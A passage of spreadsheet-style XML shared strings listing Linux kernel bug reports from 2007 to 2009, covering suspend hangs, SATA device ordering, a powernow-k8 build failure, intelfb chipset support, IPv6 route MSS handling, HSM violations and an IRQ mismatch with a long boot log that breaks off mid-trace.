  <si>
    <t>Mark Korondi</t>
  </si>
  <si>
    <t>2009-11-22 14:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Tried almost all releases from 2.6.15 but neither works. Distribution: Ubuntu (all versions), Arch Linux (all versions) Hardware Environment: Clevo M55xN Laptop, with an Intel ICH7 motherboard and a "Serial ATA Storage Controller IDE (rev 02) and IDE Controller" installed on it. (devices from 00:1f.0 to 00:1f.3 is exactly the same as in MacBook Pro 15" Core 2 Duo) Software Environment: Independent. Problem Description: After one enough long suspend/resume cycle the OS cannot switch off the CD-Drive therefore laptop cannot suspend second time (it hangs), and also cannot switch off (it reboots). During the second suspend try, the harddisk spins down, LCD switches off, USB mostly switches off (mouse indicator led blacks out), but the fan still works. Also from the CD-Drive it can be heard some noise, similar to the noises comes when the laptop POSTs after poweron, and the drive is being recognized. Of course, when suspend goes fine, I cannot open the CD-tray, but if suspend fails, I can. That's why I think that the failure comes with the CD-drive. Except this bug, suspend works fine on this computer. More information about hardware will be added by comments. Steps to reproduce: 1. Send laptop to suspend 2. Wait more than about 30 secs - 1 minute 3. Wake up it 4. Wait a bit 5.a. try to send it to suspend again (hangs) 5.b. try to poweroff (reboots)</t>
  </si>
  <si>
    <t>TX4 Device Name Order does not match physical channel numbers</t>
  </si>
  <si>
    <t>2.6.18.6</t>
  </si>
  <si>
    <t>2007-07-12 08:28 UTC</t>
  </si>
  <si>
    <t>2007-07-13 02:42 UTC</t>
  </si>
  <si>
    <t>Mikael Pettersson</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: None Distribution: Debian 4.0 Hardware Environment: x86, Promise TX4 SATA controller + Seagate SATA HDD's Problem Description: When using the Promise TX4 4-channel SATA controller, one would expect that the order of physical channels on the card matches the device name in Linux (So CH1=sda, CH2=sdb, CH3=sdc, CH4=sdd). But in fact in doesn't, the designation seems completely random. This is could unhandy, especially when swapping ie. failed harddrives of a software RAID. I also tried several other cards (Promise SX8 &amp; SIL3314), but these don't seem to suffer from this annoying problem. Is this fixable inside the driver or is this a BIOS/controller problem? Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.22-git3 doesnt compile - error in powernow-k8.c</t>
  </si>
  <si>
    <t>2.6.22 git3</t>
  </si>
  <si>
    <t>2007-07-13 05:40 UTC</t>
  </si>
  <si>
    <t>2007-07-13 13:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22-git2 Distribution: Debian Sid Hardware Environment: Athlon 64 using X86_64 Software Environment: Problem Description: kernel doesnt compile Steps to reproduce: Fails at: CC [M] arch/x86_64/kernel/cpufreq/../../../i386/kernel/cpu/cpufreq/acpi-cpufreq.o CC [M] arch/x86_64/kernel/cpufreq/../../../i386/kernel/cpu/cpufreq/powernow-k8.o arch/x86_64/kernel/cpufreq/../../../i386/kernel/cpu/cpufreq/powernow-k8.c: In function ‘powernowk8_init’: arch/x86_64/kernel/cpufreq/../../../i386/kernel/cpu/cpufreq/powernow-k8.c:1334: erreur: ‘struct cpuinfo_x86’ has no member named ‘booted_cores’ make[3]: *** [arch/x86_64/kernel/cpufreq/../../../i386/kernel/cpu/cpufreq/powernow-k8.o] Error 1 make[2]: *** [arch/x86_64/kernel/cpufreq] Error 2</t>
  </si>
  <si>
    <t>intelfb not working with i965GM</t>
  </si>
  <si>
    <t>2007-07-13 13:10 UTC</t>
  </si>
  <si>
    <t>2008-06-02 01:55 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: - Distribution: Debian Lenny/Sid x86-64 Hardware Environment: Core2Duo, i965GM Software Environment: Problem Description: The intelfb driver in the kernel does not support i965GM chipset integrated graphics controllers, only chips up to i945 are supported. Probably it wouldn't be too hard to add support for it, but I'm not a coder and therefore I can't provide a patch. However I own a laptop with Intel i965 integrated graphics and would like to help add support for the chipset by providing information such as a PCI ID and so and maybe volunteer as a tester. Please tell me what you need to know to add support for this chip, it would be great to see this chip supported! Peter</t>
  </si>
  <si>
    <t>Route advmss copied to ALL routes when interface MTU changes</t>
  </si>
  <si>
    <t>2.6.20, 2.6.22</t>
  </si>
  <si>
    <t>2007-07-14 15:39 UTC</t>
  </si>
  <si>
    <t>Simon Arlott</t>
  </si>
  <si>
    <t>2007-08-01 04:51 UTC</t>
  </si>
  <si>
    <t>Steps to reproduce: 1. Have multiple network devices and routes for them with standard (low, i.e. 1500) MTUs and default ADVMSS (e.g. 1440) 2. Change the MTU on one of them to something high (e.g. 7200) 3. The ADVMSS is incorrectly set for ALL routes based on the new MTU of the interface that changed. Note: if addrconf is running then the ADVMSS will be reset on the next RA, so this will impede attempts to reproduce. # ip -6 r fe80::/64 dev sit0 metric 256 expires 4481744sec mtu 1480 advmss 1440 hoplimit 4294967295 fe80::/64 dev ppp0 metric 256 expires 19071345sec mtu 1500 advmss 1440 hoplimit 4294967295 fe80::/64 dev eth0 metric 256 expires 19072430sec mtu 1500 advmss 1440 hoplimit 4294967295 default dev ppp0 metric 1024 expires 19071347sec mtu 1500 advmss 1440 hoplimit 4294967295 # ifconfig eth0 mtu 7200 # ip -6 r fe80::/64 dev sit0 metric 256 expires 4481732sec mtu 1480 advmss 7140 hoplimit 4294967295 &lt;-- wrong fe80::/64 dev ppp0 metric 256 expires 19071334sec mtu 1500 advmss 7140 hoplimit 4294967295 &lt;-- wrong fe80::/64 dev eth0 metric 256 expires 19072419sec mtu 7200 advmss 7140 hoplimit 4294967295 &lt;-- correct Explicitly setting the MTU on these other routes (although this is not possible without having to add another route due to bug 8755) automatically sets ADVMSS appropriately.</t>
  </si>
  <si>
    <t>HSM violations on ICH8 -&gt; ST9160821AS</t>
  </si>
  <si>
    <t>2007-07-15 01:33 UTC</t>
  </si>
  <si>
    <t>2007-10-10 18:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: Debian unstable Hardware Environment: Lenovo 3000 V200 Software Environment: Problem Description:Getting HSM violation messages, and then the driver resets. Ugly. Jul 13 04:57:51 v200 kernel: ata1.00: exception Emask 0x2 SAct 0x300 SErr 0x0 action 0x2 frozen Jul 13 04:57:51 v200 kernel: ata1.00: (spurious completions during NCQ issue=0x0 SAct=0x300 FIS=004040a1:00000080) Jul 13 04:57:51 v200 kernel: ata1.00: cmd 61/28:40:c0:b5:84/00:00:08:00:00/40 tag 8 cdb 0x0 data 20480 out Jul 13 04:57:51 v200 kernel: res 40/00:48:f8:b5:84/00:00:08:00:00/40 Emask 0x2 (HSM violation) Jul 13 04:57:51 v200 kernel: ata1.00: cmd 61/30:48:f8:b5:84/00:00:08:00:00/40 tag 9 cdb 0x0 data 24576 out Jul 13 04:57:51 v200 kernel: res 40/00:48:f8:b5:84/00:00:08:00:00/40 Emask 0x2 (HSM violation) Jul 13 04:57:51 v200 kernel: ata1: soft resetting port Jul 13 04:57:51 v200 kernel: ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Jul 13 04:57:51 v200 kernel: ata1.00: configured for UDMA/100 Jul 13 04:57:51 v200 kernel: ata1: EH complete Jul 13 04:57:51 v200 kernel: sd 0:0:0:0: [sda] 312581808 512-byte hardware sectors (160042 MB) Jul 13 04:57:51 v200 kernel: sd 0:0:0:0: [sda] Write Protect is off Jul 13 04:57:51 v200 kernel: sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 Jul 13 04:57:51 v200 kernel: sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Jul 13 07:56:31 v200 kernel: ata1.00: exception Emask 0x2 SAct 0x300 SErr 0x0 action 0x2 frozen Jul 13 07:56:31 v200 kernel: ata1.00: (spurious completions during NCQ issue=0x0 SAct=0x300 FIS=004040a1:00000080) Jul 13 07:56:31 v200 kernel: ata1.00: cmd 61/10:40:d8:b7:84/00:00:08:00:00/40 tag 8 cdb 0x0 data 8192 out Jul 13 07:56:31 v200 kernel: res 40/00:68:b0:9d:83/00:00:08:00:00/40 Emask 0x2 (HSM violation) Jul 13 07:56:31 v200 kernel: ata1.00: cmd 61/20:48:18:b8:84/00:00:08:00:00/40 tag 9 cdb 0x0 data 16384 out Jul 13 07:56:31 v200 kernel: res 40/00:68:b0:9d:83/00:00:08:00:00/40 Emask 0x2 (HSM violation) Jul 13 07:56:31 v200 kernel: ata1: soft resetting port Jul 13 07:56:31 v200 kernel: ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Jul 13 07:56:31 v200 kernel: ata1.00: configured for UDMA/100 Jul 13 07:56:31 v200 kernel: ata1: EH complete Jul 13 07:56:31 v200 kernel: sd 0:0:0:0: [sda] 312581808 512-byte hardware sectors (160042 MB) Jul 13 07:56:31 v200 kernel: sd 0:0:0:0: [sda] Write Protect is off Jul 13 07:56:31 v200 kernel: sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 Jul 13 07:56:31 v200 kernel: sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA Jul 13 09:50:15 v200 kernel: ata1.00: exception Emask 0x2 SAct 0x300 SErr 0x0 action 0x2 frozen Jul 13 09:50:15 v200 kernel: ata1.00: (spurious completions during NCQ issue=0x0 SAct=0x300 FIS=004040a1:00000080) Jul 13 09:50:15 v200 kernel: ata1.00: cmd 61/18:40:50:e9:84/00:00:08:00:00/40 tag 8 cdb 0x0 data 12288 out Jul 13 09:50:15 v200 kernel: res 40/00:48:d8:ea:84/00:00:08:00:00/40 Emask 0x2 (HSM violation) Jul 13 09:50:15 v200 kernel: ata1.00: cmd 61/30:48:d8:ea:84/00:00:08:00:00/40 tag 9 cdb 0x0 data 24576 out Jul 13 09:50:15 v200 kernel: res 40/00:48:d8:ea:84/00:00:08:00:00/40 Emask 0x2 (HSM violation) Jul 13 09:50:15 v200 kernel: ata1: soft resetting port Jul 13 09:50:16 v200 kernel: ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Jul 13 09:50:16 v200 kernel: ata1.00: configured for UDMA/100 Jul 13 09:50:16 v200 kernel: ata1: EH complete Jul 13 09:50:16 v200 kernel: sd 0:0:0:0: [sda] 312581808 512-byte hardware sectors (160042 MB) Jul 13 09:50:16 v200 kernel: sd 0:0:0:0: [sda] Write Protect is off Jul 13 09:50:16 v200 kernel: sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 Jul 13 09:50:16 v200 kernel: sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA # hdparm -I /dev/sda /dev/sda: ATA device, with non-removable media Model Number: ST9160821AS Serial Number: 5MA2N6RV Firmware Revision: 3.CLF Standards: Supported: 7 6 5 4 Likely used: 7 So, do we add { "ST9160821AS", NULL, ATA_HORKAGE_NONCQ, } to libata-core.c ? But someone who has the same disk on an HP laptop sez that he has no probem, so is this my chipset (Santa Rosa?) Help! Steps to reproduce: Wait long enough (several times a day)</t>
  </si>
  <si>
    <t>(patch queued) kernel trace dump, "IRQ handler type mismatch for IRQ x"</t>
  </si>
  <si>
    <t>2.6.22.1</t>
  </si>
  <si>
    <t>2007-07-15 12:38 UTC</t>
  </si>
  <si>
    <t>2008-10-16 06:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.14 and 2.6.19.7 Distribution: Debian Sarge Hardware Environment: pc Software Environment: Problem Description: kernel trace dump/warnings Steps to reproduce: load the pcmcia module(s) hi, I'm seeing the ktrace below when the pcmcia subsys gets activated and loads the orinoco_cs module. The wifi card seems to work fine though. thx -- paolo Linux version 2.6.22.1-ss2.2.2.10.2-dm-ia-nb-p3.1 (root@gb) (gcc version 3.4.4 2 0050314 (prerelease) (Debian 3.4.3-13sarge1)) #1 PREEMPT Thu Jul 12 17:58:40 CES T 2007 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000017ff0000 (usable) BIOS-e820: 0000000017ff0000 - 0000000017ff8000 (ACPI data) BIOS-e820: 0000000017ff8000 - 0000000018000000 (ACPI NVS) BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) Malformed early option 'acpi' 383MB LOWMEM available. Entering add_active_range(0, 0, 98288) 0 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 Normal 4096 -&gt; 98288 early_node_map[1] active PFN ranges 0: 0 -&gt; 98288 On node 0 totalpages: 98288 DMA zone: 32 pages used for memmap DMA zone: 0 pages reserved DMA zone: 4064 pages, LIFO batch:0 Normal zone: 735 pages used for memmap Normal zone: 93457 pages, LIFO batch:31 DMI 2.3 present. ACPI: RSDP 000FE030, 0014 (r0 Acer ) ACPI: RSDT 17FF0000, 002C (r1 Acer FALCON25 1 Acer 0) ACPI: FACP 17FF0054, 0074 (r1 Acer FALCON25 1 Acer 0) ACPI: DSDT 17FF00CC, 43DE (r1 Acer FALCON25 1 MSFT 100000C) ACPI: FACS 17FF8000, 0040 ACPI: BOOT 17FF002C, 0028 (r1 Acer FALCON25 1 Acer 0) ACPI: PM-Timer IO Port: 0xf108 Allocating PCI resources starting at 20000000 (gap: 18000000:e7ff0000) Built 1 zonelists. Total pages: 97521 Kernel command line: BOOT_IMAGE=linux ro root=301 idebus=66 acpi=noirq irqpoll a cpi=on apm=off panic=60 panicblink=300 resume2=file:/dev/hda3:0x10050 resume=file:/dev/hda3:0x10050 1 ide_setup: idebus=66 Misrouted IRQ fixup and polling support enabled This may significantly impact system performance Local APIC disabled by BIOS -- you can enable it with "lapic" mapped APIC to ffffd000 (01302000) Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 PID hash table entries: 2048 (order: 11, 8192 bytes) Detected 596.897 MHz processor. Console: colour VGA+ 80x34 Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) Memory: 385456k/393152k available (2385k kernel code, 7144k reserved, 787k data, 220k init, 0k highmem) virtual kernel memory layout: fixmap : 0xfffb7000 - 0xfffff000 ( 288 kB) vmalloc : 0xd8800000 - 0xfffb5000 ( 631 MB) lowmem : 0xc0000000 - 0xd7ff0000 ( 383 MB) .init : 0xc041c000 - 0xc0453000 ( 220 kB) .data : 0xc035473c - 0xc0419400 ( 787 kB) .text : 0xc0100000 - 0xc035473c (2385 kB) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay using timer specific routine.. 1198.56 BogoMIPS (lpj=5992836) Security Framework v1.0.0 initialized Mount-cache hash table entries: 512 CPU: After generic identify, caps: 0383f9ff 00000000 00000000 00000000 00000000 00000000 00000000 CPU: L1 I cache: 16K, L1 D cache: 16K CPU: L2 cache: 256K CPU: After all inits, caps: 0383f9ff 00000000 00000000 00000040 00000000 0000000 0 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. Compat vDSO mapped to ffffe000. CPU: Intel Pentium III (Coppermine) stepping 03 Checking 'hlt' instruction... OK. ACPI: Core revision 20070126 Parsing all Control Methods: Table [DSDT](id 0001) - 474 Objects with 42 Devices 141 Methods 35 Regions tbxface-0587 [02] tb_load_namespace : ACPI Tables successfully acquired ACPI: setting ELCR to 0e00 (from 0c00) evxfevnt-0091 [02] enable : Transition to ACPI mode successful NET: Registered protocol family 16 ACPI: bus type pci registered PCI: PCI BIOS revision 2.10 entry at 0xf0200, last bus=1 PCI: Using configuration type 1 Setting up standard PCI resources evgpeblk-0952 [04] ev_create_gpe_block : GPE 00 to 3F [_GPE] 8 regs on int 0x9 evgpeblk-1048 [03] ev_initialize_gpe_bloc: Found 5 Wake, Enabled 4 Runtime GPEs in this block Completing Region/Field/Buffer/Package initialization:.......................... .......................................................... Initialized 35/35 Regions 19/19 Fields 23/23 Buffers 7/14 Packages (483 nodes) Initializing Device/Processor/Thermal objects by executing _INI methods: Executed 0 _INI methods requiring 0 _STA executions (examined 46 objects) ACPI: Interpreter enabled ACPI: (supports S0 S1 S4 S5) ACPI: Using PIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) PCI: Firmware left 0000:00:0a.0 e100 interrupts enabled, disabling PCI quirk: region f100-f13f claimed by ali7101 ACPI PCI quirk: region f140-f15f claimed by ali7101 SMB ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init ACPI: bus type pnp registered pnp: PnP ACPI: found 12 devices ACPI: ACPI bus type pnp unregistered PnPBIOS: Disabled by ACPI PNP usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb PCI: Probing PCI hardware pci 0000:00:01.0: Error creating sysfs bridge symlink, continuing... pci 0000:00:13.0: Error creating sysfs bridge symlink, continuing... pci 0000:00:13.1: Error creating sysfs bridge symlink, continuing... NetLabel: Initializing NetLabel: domain hash size = 128 NetLabel: protocols = UNLABELED CIPSOv4 NetLabel: unlabeled traffic allowed by default pnp: 00:0b: ioport range 0xf100-0xf13f has been reserved pnp: 00:0b: ioport range 0xf140-0xf15f has been reserved pnp: 00:0b: ioport range 0x1060-0x106f has been reserved pnp: 00:0b: ioport range 0x40b-0x40b has been reserved pnp: 00:0b: iomem range 0xfffc0000-0xfffeffff has been reserved pnp: 00:0b: iomem range 0x0-0x9ff could not be reserved pnp: 00:0b: iomem range 0xf00-0xfff could not be reserved pnp: 00:0b: iomem range 0xffff0000-0xffffffff could not be reserved Time: tsc clocksource has been installed. PCI: Bridge: 0000:00:01.0 IO window: 8000-8fff MEM window: 80600000-820fffff PREFETCH window: disabled. PCI: Bus 2, cardbus bridge: 0000:00:13.0 IO window: 00001400-000014ff IO window: 00001800-000018ff PREFETCH window: 20000000-23ffffff MEM window: 24000000-27ffffff PCI: Bus 6, cardbus bridge: 0000:00:13.1 IO window: 00001c00-00001cff IO window: 00002000-000020ff PREFETCH window: 28000000-2bffffff MEM window: 2c000000-2fffffff PCI: Setting latency timer of device 0000:00:01.0 to 64 PCI: Guessed IRQ 11 for device 0000:00:13.0 PCI: Sharing IRQ 11 with 0000:00:13.1 PCI: Guessed IRQ 11 for device 0000:00:13.1 PCI: Sharing IRQ 11 with 0000:00:13.0 NET: Registered protocol family 2 IP route cache hash table entries: 4096 (order: 2, 16384 bytes) TCP established hash table entries: 16384 (order: 5, 131072 bytes) TCP bind hash table entries: 16384 (order: 4, 65536 bytes) TCP: Hash tables configured (established 16384 bind 16384) TCP reno registered Simple Boot Flag at 0x6e set to 0x1 io scheduler noop registered io scheduler deadline registered (default) Activating ISA DMA hang workarounds. Boot video device is 0000:01:00.0 isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 66MHz system bus speed for PIO modes Probing IDE interface ide0... hda: IBM-DARA-206000, ATA DISK drive Probing IDE interface ide1... hdd: CRN-8241B, ATAPI CD/DVD-ROM drive Probing IDE interface ide2... Probing IDE interface ide3... Probing IDE interface ide4... Probing IDE interface ide5... ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 128KiB hda: 11733120 sectors (6007 MB) w/418KiB Cache, CHS=12416/15/63 hda: cache flushes not supported hda: hda1 hda2 hda3 usbmon: debugfs is not available usbcore: registered new interface driver libusual PNP: PS/2 Controller [PNP0303:KBC0,PNP0f13:PS2M] at 0x60,0x64 irq 1,12 serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com TCP cubic registered NET: Registered protocol family 1 NET: Registered protocol family 17 NET: Registered protocol family 15 Using IPI Shortcut mode input: AT Translated Set 2 keyboard as /class/input/input0 No storage allocator is currently active. Rechecking whether we can use one. Suspend2 FileAllocator: Testing whether you can resume: Suspend2: FileAllocator: File signature found. Resuming enabled. Suspend2: Resuming enabled. Suspend2 2.2.10.2, with support for [checksumming], usm, compression, swap stora ge, file storage, userui. Suspend2: Checking whether there is an image to restore. Suspend2: Image invalidated. kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 220k freed Write protecting the kernel text: 2388k Write protecting the kernel read-only data: 622k hdd: ATAPI 24X CD-ROM drive, 128kB Cache Uniform CD-ROM driver Revision: 3.20 Linux agpgart interface v0.102 (c) Dave Jones agpgart: Detected ALi M???? chipset agpgart: AGP aperture is 64M @ 0xe0000000 ALI15X3: IDE controller at PCI slot 0000:00:10.0 ALI15X3: chipset revision 195 ALI15X3: not 100% native mode: will probe irqs later ALI15X3: port 0x01f0 already claimed by ide0 ALI15X3: port 0x0170 already claimed by ide1 ALI15X3: neither IDE port enabled (BIOS) e100: Intel(R) PRO/100 Network Driver, 3.5.17-k4-NAPI e100: Copyright(c) 1999-2006 Intel Corporation PCI: Guessed IRQ 10 for device 0000:00:0a.0 e100: eth0: e100_probe: addr 0x80100000, irq 10, MAC addr 00:00:E2:xx:xx:xx Yenta: CardBus bridge found at 0000:00:13.0 [1025:1010] Yenta O2: res at 0x94/0xD4: ea/00 Yenta O2: enabling read prefetch/write burst input: PC Speaker as /class/input/input1 Yenta: ISA IRQ mask 0x04b8, PCI irq 11 Socket status: 30000410 Yenta: CardBus bridge found at 0000:00:13.1 [1025:1010] Yenta: ISA IRQ mask 0x04b8, PCI irq 11 Socket status: 30000410 ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver PCI: Guessed IRQ 11 for device 0000:00:14.0 ohci_hcd 0000:00:14.0: OHCI Host Controller ohci_hcd 0000:00:14.0: new USB bus registered, assigned bus number 1 ohci_hcd 0000:00:14.0: irq 11, io mem 0x82400000 Synaptics Touchpad, model: 1, fw: 4.6, id: 0x925ea1, caps: 0x80471b/0x0 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 2 ports detected input: SynPS/2 Synaptics TouchPad as /class/input/input2 Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled PCI: Guessed IRQ 10 for device 0000:00:06.0 Real Time Clock Driver v1.12ac NET: Registered protocol family 23 pccard: PCMCIA card inserted into slot 0 00:07: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A usb 1-2: new low speed USB device using ohci_hcd and address 2 pccard: PCMCIA card inserted into slot 1 usb 1-2: configuration #1 chosen from 1 choice parport_pc 00:09: reported by Plug and Play ACPI parport0: PC-style at 0x378 (0x778), irq 7, dma 1 [PCSPP,TRISTATE,COMPAT,ECP,DMA ] usbcore: registered new interface driver hiddev input: Fujitsu Component Apple Optical USB Mouse as /class/input/input3 input: USB HID v1.10 Mouse [Fujitsu Component Apple Optical USB Mouse] on usb-00 00:00:14.0-2 usbcore: registered new interface driver usbhid drivers/hid/usbhid/hid-core.c: v2.6:USB HID core driver EXT3 FS on hda1, internal journal lp0: using parport0 (interrupt-driven). Software Watchdog Timer: 0.07 initialized. soft_noboot=0 soft_margin=60 sec (now ayout= 0) ACPI: AC Adapter [AC] (on-line) ACPI: Battery Slot [BAT0] (battery present) input: Power Button (FF) as /class/input/input4 ACPI: Power Button (FF) [PWRF] input: Sleep Button (CM) as /class/input/input5 ACPI: Sleep Button (CM) [SLPB] input: Lid Switch as /class/input/input6 ACPI: Lid Switch [LID] ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Thermal Zone [THR2] (53 C) Marking TSC unstable due to: possible TSC halt in C2. Time: acpi_pm clocksource has been installed. [drm] Initialized drm 1.1.0 20060810 tun: Universal TUN/TAP device driver, 1.6 tun: (C) 1999-2004 Max Krasnyansky &lt;maxk@qualcomm.com&gt; Capability LSM initialized Hangcheck: starting hangcheck timer 0.9.0 (tick is 180 seconds, margin is 60 sec onds). Hangcheck: Using get_cycles(). input: Acer hotkey driver as /class/input/input7 Acer Travelmate hotkey driver v0.5.34 IA-32 Microcode Update Driver: v1.14a &lt;tigran@aivazian.fsnet.co.uk&gt; Clocksource tsc unstable (delta = -132312396 ns) kjournald starting. Commit interval 5 seconds EXT3-fs warning: maximal mount count reached, running e2fsck is recommended EXT3 FS on hda2, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3-fs warning: maximal mount count reached, running e2fsck is recommended EXT3 FS on hda3, internal journal EXT3-fs: mounted filesystem with ordered data mode. pcmcia: Detected deprecated PCMCIA ioctl usage from process: discover. pcmcia: This interface will soon be removed from the kernel; please expect break age unless you upgrade to new tools. pcmcia: see http://www.kernel.org/pub/linux/utils/kernel/pcmcia/pcmcia.html for details. cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! setserial sets custom speed on ttyS0. This is deprecated. orinoco 0.15 (David Gibson &lt;hermes@gibson.dropbear.id.au&gt;, Pavel Roskin &lt;proski@ gnu.org&gt;, et al) orinoco_cs 0.15 (David Gibson &lt;hermes@gibson.dropbear.id.au&gt;, Pavel Roskin &lt;pros ki@gnu.org&gt;, et al) cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! cs: warning: no high memory space available! cs: unable to map card memory! cs: unable to map card memory! pcmcia: Detected deprecated PCMCIA ioctl usage from process: cardmgr. pcmcia: This interface will soon be removed from the kernel; please expect break age unless you upgrade to new tools. pcmcia: see http://www.kernel.org/pub/linux/utils/kernel/pcmcia/pcmcia.html for details. cs: IO port probe 0x100-0x4ff: excluding 0x200-0x207 0x220-0x22f 0x2f8-0x2ff 0x3 30-0x337 0x388-0x38f 0x480-0x48f 0x4d0-0x4d7 cs: IO port probe 0x100-0x4ff: excluding 0x200-0x207 0x220-0x22f 0x2f8-0x2ff 0x3 30-0x337 0x388-0x38f 0x480-0x48f 0x4d0-0x4d7 cs: IO port probe 0x800-0x8ff: clean. cs: IO port probe 0x800-0x8ff: clean. cs: IO port probe 0xc00-0xcff: clean. cs: IO port probe 0xc00-0xcff: clean. cs: IO port probe 0xa00-0xaff: clean. cs: memory probe 0xa0000000-0xa0ffffff: clean. orinoco_cs 0.15 (David Gibson &lt;hermes@gibson.dropbear.id.au&gt;, Pavel Roskin &lt;pros ki@gnu.org&gt;, et al) pcmcia: registering new device pcmcia0.0 eth1: Hardware identity 0001:0001:0004:0002 eth1: Station identity 001f:0001:0007:001c eth1: Firmware determined as Lucent/Agere 7.28 eth1: Ad-hoc demo mode supported eth1: IEEE standard IBSS ad-hoc mode supported eth1: WEP supported, 104-bit key eth1: MAC address 00:02:2D:xx:xx:xx eth1: Station name "HERMES I" eth1: ready eth1: orinoco_cs at 0.0, irq 5, io 0x0100-0x013f cs: memory probe 0xa0000000-0xa0ffffff: excluding 0xa0000000-0xa00fffff pcmcia: registering new device pcmcia1.0 IRQ handler type mismatch for IRQ 10 current handler: ALI 5451 [&lt;c01563d7&gt;] setup_irq+0x1c7/0x210 [&lt;c0156660&gt;] request_irq+0xb0/0x100 [&lt;d8a4b1a0&gt;] test_action+0x0/0x10 [pcmcia] [&lt;d8a4b2c5&gt;] pcmcia_request_irq+0x115/0x210 [pcmcia] [&lt;d89a66d8&gt;] simple_config+0x1b8/0x360 [serial_cs] [&lt;d88d18ef&gt;] read_cis_cache+0x10f/0x180 [pcmcia_core] [&lt;d88d2f0f&gt;] parse_cftable_entry+0x22f/0x380 [pcmcia_core] [&lt;d89a6cf4&gt;] serial_config+0x154/0x210 [serial_cs] [&lt;d8a485e0&gt;] pcmcia_device_probe+0xd0/0x170 [pcmcia] [&lt;c0284f3c&gt;] really_probe+0x9c/0x150 [&lt;c0285042&gt;] driver_probe_device+0x42/0x60 [&lt;c028417a&gt;] bus_for_each_drv+0x3a/0x60 [&lt;c02850bb&gt;] device_attach+0x4b/0x80 [&lt;c0285060&gt;] __device_attach+0x0/0x10 [&lt;c028491d&gt;] bus_rescan_devices_helper+0x1d/0x70 [&lt;c028408a&gt;] bus_for_each_dev+0x3a/0x60 [&lt;c0284983&gt;] bus_rescan_devices+0x13/0x20 [&lt;c0284900&gt;] bus_rescan_devices_helper+0x0/0x70 [&lt;d8a4ba74&gt;] bind_request+0x1f4/0x2e0 [pcmcia] [&lt;d8a4c64a&gt;] ds_ioctl+0x57a/0x690 [pcmcia] [&lt;c0177465&gt;] min_pages_to_free+0x15/0x30 [&lt;d8a4c0d0&gt;] ds_ioctl+0x0/0x690 [pcmcia] [&lt;c0186bac&gt;] do_ioctl+0xac/0xd0 [&lt;c0186d4e&gt;] vfs_ioctl+0x5e/0x1d0 [&lt;c0186f37&gt;] sys_ioctl+0x77/0x90 [&lt;c01040ea&gt;] syscall_call+0x7/0xb ======================= IRQ handler type mismatch for IRQ 5 current handler: pcmcia0.0 [&lt;c01563d7&gt;] setup_irq+0x1c7/0x210 [&lt;c0156660&gt;] request_irq+0xb0/0x100 [&lt;d8a4b1a0&gt;] test_action+0x0/0x10 [pcmcia] [&lt;d8a4b2c5&gt;] pcmcia_request_irq+0x115/0x210 [pcmcia] [&lt;d89a66d8&gt;] simple_config+0x1b8/0x360 [serial_cs] [&lt;d88d18ef&gt;] 